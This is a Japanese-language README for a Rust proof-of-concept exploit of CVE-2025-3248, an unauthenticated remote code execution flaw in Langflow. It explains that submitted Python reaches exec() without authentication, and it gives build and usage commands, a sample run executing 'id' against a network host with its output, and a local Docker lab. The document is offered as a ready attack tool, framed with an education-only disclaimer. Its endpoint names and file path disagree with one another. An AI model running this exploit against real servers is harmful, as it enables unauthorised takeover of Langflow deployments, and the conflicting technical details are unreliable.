
CVE-2025-3248 に対する Rust ベースの概念実証エクスプロイト。Langflow の /api/v1/validate/code エンドポイントを介した、認証不要のリモートコード実行を標的としています。テスト用のローカル Docker ラボを含みます。
⚠️ 免責事項
このコードは教育および研究目的のみを目的としています。明示的な許可なくシステムで無断使用することは、法律違反となる可能性があります。
作者は、このツールの誤用や悪意のある活動について一切の責任を負いません。
CVE-2025-3248 - 重要
CVSS スコア: 9.8 | EPSS スコア: 92.57% | 公開日: 2025年5月22日
エンドポイント /api/v1/validate/code はサニタイズされていない Python コードを受け入れ、exec() で直接実行します。認証は不要です。
# langflow/api/builder/execute.py
exec(code) # No input validation or sandboxing!
Langflow は /api/v1/builder/execute_code エンドポイントを公開しており、ユーザーが提供した Python コードを受け取り、バックエンドで直接 exec() に渡します。認証やサンドボックスがないため、攻撃者は任意のペイロードを作成してコードを実行できます。
# Clone repository
git clone <repo-url>
cd CVE-2025-3248-POC
cargo build --release
# ./target/release/CVE-2025-3248-POC
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"
❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860,
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)
> cd lab
> sudo docker-compose up -d
> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'
> sudo docker-compose down